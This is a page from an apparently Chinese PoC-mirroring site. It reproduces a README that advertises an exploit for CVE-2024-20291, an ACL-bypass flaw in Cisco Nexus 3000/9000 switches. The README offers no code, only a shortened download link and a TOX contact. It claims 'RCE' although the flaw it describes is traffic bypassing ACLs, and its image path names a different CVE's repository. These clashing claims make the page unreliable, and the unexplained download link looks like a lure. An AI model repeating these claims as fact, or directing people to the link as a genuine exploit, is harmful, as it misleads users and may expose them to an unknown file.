Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-20291 PoC — Cisco Nexus 3000 Series Switches 安全漏洞

Source
Associated Vulnerability
Title:Cisco Nexus 3000 Series Switches 安全漏洞 (CVE-2024-20291)
Description:Cisco Nexus 3000 Series Switches是美国思科(Cisco)公司的一款3000系列交换机。 Cisco Nexus 3000 and 9000 Series Switches存在安全漏洞,该漏洞源于对端口进行配置更改时硬件编程不正确。
Description
CVE-2024-20291-POC exploit ---> RCE
Readme
# CVE-2024-20291-POC

![CVE-2024-20291](https://github.com/c0d3b3af/CVE-2024-21762-POC/assets/161638405/a2a5a91a-3057-4a15-924d-8ad93a00aadb)

**Proof of Concept:** 
CVE-2024-20291 is an access control list (ACL) programming vulnerability for the port link subinterfaces of **Cisco Nexus 3000 and 9000** series switches. In NX-OS offline mode, I was able to remotely unauthenticated to send traffic that should be blocked through the affected device. 

This vulnerability is due to hardware misprogramming that occurs when the configuration of channel member ports is changed. **Exploit successfully allows you to access network resources that need to be protected by the ACLs applied on the port channel subinterfaces.** 

Judging by my attempts to replicate the exploit from scratch, it was a bit sophisticated and markedly different from previous Cisco Nexus vulnerabilities. exploit.py is an exploit that is written in python and is capable of multithreading and IPS listing **Vulnerable Cisco Nexus 3000 and 9000** series Before you begin, read the instructions for running in Readme.txt

## [Download here](https://t.ly/XTt1u)

any questions in TOX: **4R7G9T2Y1F8E6W3Q1A5S7D9F2G1H3J5K7L9Z2X1C3V5B7N9M2**
File Snapshot

[4.0K] /data/pocs/c83272a8b3fdd622f28174a7ac1417ad6f25ac5a └── [1.2K] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.